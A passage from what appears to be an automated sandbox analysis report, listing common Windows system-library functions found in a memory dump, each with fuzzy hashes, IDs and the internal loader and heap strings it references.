Opcode Fuzzy Hash: 0eefed4bec24fc56c1f4b3692ea250ec327e8386bcc2c78acde78777c64d8494
Instruction Fuzzy Hash: C4A16D3192166A9BDF31DF68CC88BAAB7B8FF44714F5001E9EA09A7250D7359E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 012AB73D, Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 012F2BF3
HEAP: , xrefs: 012F2BE8
HEAP[%wZ]: , xrefs: 012F2BDB

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 168ef9b7f07676165066963495f2bbbd23be16840158bf1b7af54e9823d7b494
Instruction ID: 6be2ed91bb094404173f64390db2c3a5085694d3097e63af422444f0595bee4f
Opcode Fuzzy Hash: 168ef9b7f07676165066963495f2bbbd23be16840158bf1b7af54e9823d7b494
Instruction Fuzzy Hash: 1961C071620246DFDB29DF28C885B6ABFE5FF05304F58856EE94A8F241D770E881CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013323E3, Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0133255C
HEAP[%wZ]: , xrefs: 0133254F
Heap block at %p modified at %p past requested size of %Ix, xrefs: 0133256F

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 0a512cd266a69c3da2586a5a3e09c3d10f901f8361355d361ddc8e500313797d
Instruction ID: 86b1e63b880a3fc3c76d1c36c52565f1c3a4fed8efecb2f3cc3934b21df45840
Opcode Fuzzy Hash: 0a512cd266a69c3da2586a5a3e09c3d10f901f8361355d361ddc8e500313797d
Instruction Fuzzy Hash: 6E512334110264CAF334CE2EC854773BBF9EBC8648F54889DE8C28B685D239D846DB24

Uniqueness

Uniqueness Score: -1.00%

Function 0128E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0128E68C
@, xrefs: 0128E6C0
InstallLanguageFallback, xrefs: 0128E6DB

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: b41e6398255d5e34e87c46ae251bd20644a89663d8a37837e4a9fbe215bbdbe4
Instruction ID: bc85c5a0389808920dfe5d092d47b34adc20b1775c37f65d2101cf0282961828
Opcode Fuzzy Hash: b41e6398255d5e34e87c46ae251bd20644a89663d8a37837e4a9fbe215bbdbe4
Instruction Fuzzy Hash: 9F51DF766393469BD714EF28C444A7BB3E8EF98618F45092EFA85D7240F734DA04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 013134A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 013135C1

Strings

@, xrefs: 0131350A

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: CallFilterFunc@8
String ID: @
API String ID: 4062629308-2766056989
Opcode ID: b2f0289803111eb3af707af44b34206b87951a38b58fcfb87821d2bf0dc533a1
Instruction ID: b99880ac09ae2fff771b6c0189b0f2fc56a9200e5af45dbfa367e69744447d00
Opcode Fuzzy Hash: b2f0289803111eb3af707af44b34206b87951a38b58fcfb87821d2bf0dc533a1
Instruction Fuzzy Hash: DF418EB1900259DBDB25DFA9C980A7EBBB8FF54B24F04452AEA04DB358D774D940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0129D5E0, Relevance: 2.9, Strings: 2, Instructions: 353COMMON

Download Yara Rule

Strings

h+, xrefs: 0129D8CE
X0, xrefs: 0129D69D

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: X0$h+
API String ID: 0-1552749228
Opcode ID: 8bab4d82cc0bd81602dc2f8fa695fc01bf60a94cfd1a675b885e6829575f72a9
Instruction ID: c3d14d585845088eebc10a4ba0765b317400006fea548df983b05ebf20b4fd1c
Opcode Fuzzy Hash: 8bab4d82cc0bd81602dc2f8fa695fc01bf60a94cfd1a675b885e6829575f72a9
Instruction Fuzzy Hash: 08E1D030A2035ACFEF35CF6CC995BB9B7B6BF45304F0401A9DA09AB291D7749981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0129B62E, Relevance: 2.8, Strings: 2, Instructions: 349COMMON

Download Yara Rule

Strings

'LDR: %s(), invalid image format of MUI file , xrefs: 012EA93C
LdrpLoadResourceFromAlternativeModule, xrefs: 012EA937

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule
API String ID: 0-411237641
Opcode ID: 92d2e63bf75c504f29ef7d92fc80e2a09bb330e985b11b7f75757acd37545357
Instruction ID: d8356f17a758be95275921e8333aa0c02ac06b7a0fca75b69603385894ce094a
Opcode Fuzzy Hash: 92d2e63bf75c504f29ef7d92fc80e2a09bb330e985b11b7f75757acd37545357
Instruction Fuzzy Hash: 2CD1AE35628342CFEB25CF2CD484B6ABBE5BF88744F04492DFA899B291D770D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 012999C7, Relevance: 2.8, Strings: 2, Instructions: 294COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Exit, xrefs: 01299A04
LdrResFallbackLangList Enter, xrefs: 012999F2

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-1720564570
Opcode ID: 779735d34ae95493ab4ccf9e4baa04d3329691dbc153d4626c6025d414e0e6c2
Instruction ID: b5c86841841fb5b24d6199b646807e9765ade32f806d5f249ce68e70fdeaf9ba
Opcode Fuzzy Hash: 779735d34ae95493ab4ccf9e4baa04d3329691dbc153d4626c6025d414e0e6c2
Instruction Fuzzy Hash: 94B1AD312283868BDF14CF1CC440B6ABBE4FF85768F44496DF98997281E778D984C752

Uniqueness

Uniqueness Score: -1.00%

Function 0134E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON

Download Yara Rule

Strings

`, xrefs: 0134E670
`, xrefs: 0134E5D7

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: ac39fd9277f89ea20350cc40704d8e730aa3b2f412a90a6eae2e1c965a1dbbc8
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 09917F716043429BE724CF29C945B2BBBE5BF84728F14892DF699CB290E778F904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013051BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

Legacy, xrefs: 01305226
UEFI, xrefs: 0130521D

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: beb0395d107523b1237ac5439340feaf8ea10247b169f44f95bd2627dfe9b614
Instruction ID: 237e4f39121d81ce978b8641ba7f9d1a8a94e76cda69f4a50eaeeeca8b5538f9
Opcode Fuzzy Hash: beb0395d107523b1237ac5439340feaf8ea10247b169f44f95bd2627dfe9b614
Instruction Fuzzy Hash: E2516CB1A106099FDB26DFA8C960BAEBBF8FF48704F14446DE649EB291D7719940CF10

Uniqueness

Uniqueness Score: -1.00%

Function 012B84E0, Relevance: 2.7, Strings: 2, Instructions: 172COMMON

Download Yara Rule

Strings

LdrpResGetMappingSize Exit, xrefs: 012B850C
LdrpResGetMappingSize Enter, xrefs: 012B84FA

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
API String ID: 0-1497657909
Opcode ID: 47e458ea358947244d826688f2ec68c7df60bf2dd9ce9edcb3d3786c568aa10d
Instruction ID: d65f3bfc0c419d255bcae0f23e52befcadeed00069e7e949f1ac5801746fd996
Opcode Fuzzy Hash: 47e458ea358947244d826688f2ec68c7df60bf2dd9ce9edcb3d3786c568aa10d
Instruction Fuzzy Hash: DC51D671A20646DFEB11CFA8D880BEDBBB9BF14784F054129EB15EB291E774D940CB24

Uniqueness

Uniqueness Score: -1.00%

Function 01284439, Relevance: 2.6, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

0, xrefs: 012844A3
Flst, xrefs: 01284476

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 1732beb270c034321db0f006e7fa4e2cb1b1bed129264d56117edebbcba0df2b
Instruction ID: 457fa2586087841b1d5a294ac90dcc478c06847e70fb734ee424bb24bab3d06e
Opcode Fuzzy Hash: 1732beb270c034321db0f006e7fa4e2cb1b1bed129264d56117edebbcba0df2b
Instruction Fuzzy Hash: D241ADB1A2168ACFDB25DF9DC4847ADFBF5EF44314F64802ED24A9B681D7709842CB80

Uniqueness

Uniqueness Score: -1.00%

Function 012961A7, Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 012961CE
RtlpResUltimateFallbackInfo Exit, xrefs: 012961DD

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: b8bfba556f21b04af8e1f3aaa2653a3a51d57f2e4c88ef267691580c42c0dd38
Instruction ID: 665e350703e8df48aa518ad6231204b88433b54d9115ed64f36bfe21c55fb7d9
Opcode Fuzzy Hash: b8bfba556f21b04af8e1f3aaa2653a3a51d57f2e4c88ef267691580c42c0dd38
Instruction Fuzzy Hash: 1141ED71A20246DBEF21CFADC844B7A7BF4FF81304F5440A6EA04DB2A1EB759940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012BD4B0, Relevance: 2.6, Strings: 2, Instructions: 67COMMON

Download Yara Rule

Strings

RtlpInitializeAssemblyStorageMap, xrefs: 012FB0B2
SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 012FB0B7

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: ddab723d950b5eac4ef9e1b4d5f76d01e9488f3260e9e2bf5f8c7d84d61ab295
Instruction ID: 03f817747b68f428b9c76e2d07141e428ad20b486222ca3ae65153cc2e72a54d
Opcode Fuzzy Hash: ddab723d950b5eac4ef9e1b4d5f76d01e9488f3260e9e2bf5f8c7d84d61ab295
Instruction Fuzzy Hash: 5F110A72B20209BBF7248A8DCD81FEBB6A9DB94B54F14802D7B04DB240E6B5DD0082A4

Uniqueness

Uniqueness Score: -1.00%

Function 0129C1C0, Relevance: 2.1, Strings: 1, Instructions: 876COMMON

Download Yara Rule

Strings

MUI, xrefs: 0129C2EE, 0129CB6D, 0129CE47

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 6c4a8702fb8c20ee90663adf9901415bca0c8337f48b2a07e3c650cc15be64dd
Instruction ID: de67073c4268ad5c41aea38d4153fd06016f2509e3680d70f5613929d61a6e73
Opcode Fuzzy Hash: 6c4a8702fb8c20ee90663adf9901415bca0c8337f48b2a07e3c650cc15be64dd
Instruction Fuzzy Hash: DB728B75E2021ACFEF25CFACC8847ADBBB5BF48310F14816AD959AB241D7709991CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012AB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012AB9A5

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 515b698126f9e551d3ee1982fdfa62a49ce04bbce41351d4afc13a0103cab00f
Instruction ID: 05b122bca25cbac3105a353e61f227df43a3ccfa89d4a956f3df4f54b61a3c1b
Opcode Fuzzy Hash: 515b698126f9e551d3ee1982fdfa62a49ce04bbce41351d4afc13a0103cab00f
Instruction Fuzzy Hash: 45514971A28342CFC720CF69C09092ABBE5FB88710F94496EEA9597355D771E844CF92

Uniqueness

Uniqueness Score: -1.00%

Function 012B2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

PATH, xrefs: 012B2642, 012B2691

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: de15b34fd3b0c9e07af7fae04764362f2a2b4699e7aa9293e6ee6508b8963299
Instruction ID: b8f83f940a154729b62a850c77ecfdc7bae9d267c7f84197d2f8631ef2b4a920
Opcode Fuzzy Hash: de15b34fd3b0c9e07af7fae04764362f2a2b4699e7aa9293e6ee6508b8963299
Instruction Fuzzy Hash: 0AC18C71D2021AEFDB29DF99D8C1AFDBBB5FF48780F144029E601AB250E774A841DB64

Uniqueness

Uniqueness Score: -1.00%

Function 012BD7CA, Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

@, xrefs: 012BD883

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: f9e51fa7ed1cb36f85b7a86adbf40520465290fbffd2fdb35cf32ec65272afcf
Instruction ID: 1bcdebc4c3cb45fcbc81cf750a4229bdfc02b770f6e6fe58fe729b1aced5dbb2
Opcode Fuzzy Hash: f9e51fa7ed1cb36f85b7a86adbf40520465290fbffd2fdb35cf32ec65272afcf
Instruction Fuzzy Hash: 5D619071D2161EEBDF21DFA8C880BEEBBB5FF84758F104269EA14A7250D7709A01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012852A5, Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

8-, xrefs: 012852C4, 012E0E70, 012E0EE0

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: 8-
API String ID: 0-1897437538
Opcode ID: daaa027f0f96220f8e2ff4b44dc98d26bd440d0d94dac14397e667ea905164f4
Instruction ID: 090551206bdd069ed044eea643b818d6ee77d83f107bed754471bfade2a24a2e
Opcode Fuzzy Hash: daaa027f0f96220f8e2ff4b44dc98d26bd440d0d94dac14397e667ea905164f4
Instruction Fuzzy Hash: DD51FF31226342DBDB21EF68C845B27BBE4FF60714F14091EF59583692EBB4E840C796

Uniqueness

Uniqueness Score: -1.00%

Function 012BF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 012BF124

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 26ae6a4e94de513fdef1af07d06bbc6f1b7a796be5ba00aae1013441abb315e0
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 6651AD71510711AFC320DF28C840A6BBBF8FF48B50F008A2EFA9587690E7B4E944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01285050, Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

8-, xrefs: 0128513F, 0128515E

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: 8-
API String ID: 0-1897437538
Opcode ID: c2875cc4f0b10857581b4bbbd14c68bca80ee25b375e1e52f844ca60415e5431
Instruction ID: be9c4d3ac9e4c86353d14c19589bcd375a51fbdb4eae99e122174120dec45cff
Opcode Fuzzy Hash: c2875cc4f0b10857581b4bbbd14c68bca80ee25b375e1e52f844ca60415e5431
Instruction Fuzzy Hash: 2841F2366253029BC320EF28CC80B7ABBE4AF54750F510929FA959B391E7B0DC52C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 01303540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0130358F

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 321ee54b762b6a24cc0a75a2294c58aa451b939c3a00be107da6f6bd969a2358
Instruction ID: c07fec78e0d1455c2b620e5856601ab153b2d20f81114ec9fc8864d38fd1eeb6
Opcode Fuzzy Hash: 321ee54b762b6a24cc0a75a2294c58aa451b939c3a00be107da6f6bd969a2358
Instruction Fuzzy Hash: CF4131B291052D9FDB21DA54CC90FAEB77CAB54718F0045A5EB09AB280DB309E88CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01290100, Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

`d, xrefs: 0129013C, 012901D2, 012E617B, 012E6188

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: `d
API String ID: 0-2674330335
Opcode ID: 6384703560c36f2df5b840f583f52ebaaf86d6cfaf3561aaedef4961f80484d9
Instruction ID: ec8c5b62ddd208ac0b978aa63c701941dba05da7aa2c5fbf1997dcb97d43e606
Opcode Fuzzy Hash: 6384703560c36f2df5b840f583f52ebaaf86d6cfaf3561aaedef4961f80484d9
Instruction Fuzzy Hash: D141CCB197560ACFDF62DF6CC8957AA7BB8BF24314F440159E511AB396C370C980CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 013505AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

`, xrefs: 01350633

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 7fcb967c0f97841ef6e6d1921a0a52c76735b2455dfc800ddfb3c822b4b1ab30
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: E03104322043066BE754DE28CC85F977BD9EBC4B68F144229FE58AB280D771E904C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 012914A9, Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

#, xrefs: 012E695C

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 7214fd34cf6f3db3f10b96e9e4271c303fd579c4ef9ef36f97b02541178c6b54
Instruction ID: 14c1d0d7f059f405e5b5796e2063520cb70e1e8108ac31ebae67eab3a115e6f4
Opcode Fuzzy Hash: 7214fd34cf6f3db3f10b96e9e4271c303fd579c4ef9ef36f97b02541178c6b54
Instruction Fuzzy Hash: EA411F71A2020BDBCF21DF4DD890BBEB7B9EF50721F45011AEA46A7200DB30D861CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012B4020, Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 012B40E8

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
API String ID: 0-996340685
Opcode ID: 692ce0d87db1b69badead815e8fad6d6e2dc6b8e0872ab5bc3762752eae4f1bb
Instruction ID: 1ebe176c3d62ab91c9e9184ae65eaf2f361134ac4c4ed452f661d644ea9afc50
Opcode Fuzzy Hash: 692ce0d87db1b69badead815e8fad6d6e2dc6b8e0872ab5bc3762752eae4f1bb
Instruction Fuzzy Hash: 43417475A2078A9ADB25EFB8C4C16E6F7F8EF15740F00493ED69AC3241E370A545CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01303884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 013038B4

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: dab10e4e87b8ccdc64a40684e1a7f0f634a77b61a333ce0e37052c6b639d5702
Instruction ID: 268bb6dfd8d0177257b4683536ed22331802d65f6f3a967e3f07e3531e0c28db
Opcode Fuzzy Hash: dab10e4e87b8ccdc64a40684e1a7f0f634a77b61a333ce0e37052c6b639d5702
Instruction Fuzzy Hash: 4331E332D0051AAFEB16DB58C955E7BBBB8FF80B24F114169EA55A72D0D7309E04C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 012BD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 012BD303

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 83a33d00aba49a788aa06163df5bb7c1a3102b87165d7c37cd916e4ba7a1db8b
Instruction ID: b08f6ec1722f41fc74883f0256980613721f4e07ce424b323d073da57e068d0f
Opcode Fuzzy Hash: 83a33d00aba49a788aa06163df5bb7c1a3102b87165d7c37cd916e4ba7a1db8b
Instruction Fuzzy Hash: 6331D57156930A9FC311DF68C8C19EBBBE8EB85798F000A2EFA8483211D635DD04CF92

Uniqueness

Uniqueness Score: -1.00%

Function 012AF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 012AF73F

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 7004372d583d04fdaf9c47334502344da1cad8c8a71fb0754eaf184c38c46077
Instruction ID: 1ded3332c93dfce7aff5ea19cb44605a0635d5d0cd4005e35423f4cd15e649d5
Opcode Fuzzy Hash: 7004372d583d04fdaf9c47334502344da1cad8c8a71fb0754eaf184c38c46077
Instruction Fuzzy Hash: B011BE343347538BEB3C4E1C8E9163E7E95AB85364FA4452AE662CB391EAB8C8408340

Uniqueness

Uniqueness Score: -1.00%

Function 013460F5, Relevance: .6, Instructions: 558COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b32536da59bfe8567e1ffa7f76740058c262ec2d9aab5f638266a00bed0b3d
Instruction ID: 5171ed8ca2b25b515bda2d092b6d3ff5965e6ee193491224f991a4307290dffe
Opcode Fuzzy Hash: 43b32536da59bfe8567e1ffa7f76740058c262ec2d9aab5f638266a00bed0b3d
Instruction Fuzzy Hash: B322A1B16047118FDB19CF18C491A2AB7E2FF8A318F148A6DE996CB355D730F846CB81

Uniqueness

Uniqueness Score: -1.00%

Function 012A4120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525cb122edf728743a40267c2bdb5ae191311fde93aabeb19d6418037497253a
Instruction ID: 311a2a4d5eca6682ec2e9a8c8be5babad7deb301043fa40bc0b92cbf06766817
Opcode Fuzzy Hash: 525cb122edf728743a40267c2bdb5ae191311fde93aabeb19d6418037497253a
Instruction Fuzzy Hash: EAF1AE706283528FD724DF18C485A7AB7E1FF98704F99492EF686CB250E7B4D881CB52

Uniqueness

Uniqueness Score: -1.00%

Function 012934B1, Relevance: .4, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96c2f874d3dc5b4d9421a7b36a81a3dd36c3f429a932a27a4c5ea318a08f9dc6
Instruction ID: 48b4f20838c676216a04cd94c20e0f2fccc907d72332a2844ceb49c21cc72f6c
Opcode Fuzzy Hash: 96c2f874d3dc5b4d9421a7b36a81a3dd36c3f429a932a27a4c5ea318a08f9dc6
Instruction Fuzzy Hash: E3F14271E2021A9BDF19DFADD984AAEBBF5BF48710F048129EA05A7341E774DC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012B20A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f2ebb09fd84d885ae0d5ad620eb3c4a68e655877bd5af779bad41c4fa92822
Instruction ID: be52d49373b6dac483d5399d355e63bb0762653d73f7e6663715593b342aa3f5
Opcode Fuzzy Hash: 80f2ebb09fd84d885ae0d5ad620eb3c4a68e655877bd5af779bad41c4fa92822
Instruction Fuzzy Hash: B4F11731638342DFD725CF2CC4817AABBE5AF857A4F04852DEB958B281D774E841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01286800, Relevance: .4, Instructions: 373COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a8601793600ef0849c8e74838647860641539f699741d868c3510770f5ee7ad
Instruction ID: 3b426bb2518cac8df7ce3f18f2d24b965123e75e6e90c1f871124bdefa9bd733
Opcode Fuzzy Hash: 1a8601793600ef0849c8e74838647860641539f699741d868c3510770f5ee7ad
Instruction Fuzzy Hash: E5D1C171A212069BCB14EF68C895ABEB7F5EF14314F04822DEA16DB2C0F734E955CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012B65A0, Relevance: .4, Instructions: 368COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c33727a087afee806a1a294756882c93c24167f1681991802acba985d4c1b3af
Instruction ID: d154289833e61e2d65564b56450b34302ffca72bcc9a78d3b8c322eb3fc289d4
Opcode Fuzzy Hash: c33727a087afee806a1a294756882c93c24167f1681991802acba985d4c1b3af
Instruction Fuzzy Hash: E9E1B175A10206CFDB18CF58C880AA9BBF1FF48350F18816DEA55EB391D734E985CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012A4670, Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp, Offset: 01260000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b192b08e8824a40c602e1b89ce0d466fc831b6c808c5b78a3597740a4a24dd6e
Instruction ID: ad612e97d25ba97a364b92c7f8b5e16182155465c45a2ce9e4f9ecb215591d87
Opcode Fuzzy Hash: b192b08e8824a40c602e1b89ce0d466fc831b6c808c5b78a3597740a4a24dd6e
Instruction Fuzzy Hash: 73E1BD70A2028ADFDB29DF58C845BBEBBF2EF85304F598069D506AB341D7B4E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012AB236, Relevance: .3, Instructions: 305COMMON

Download Yara Rule

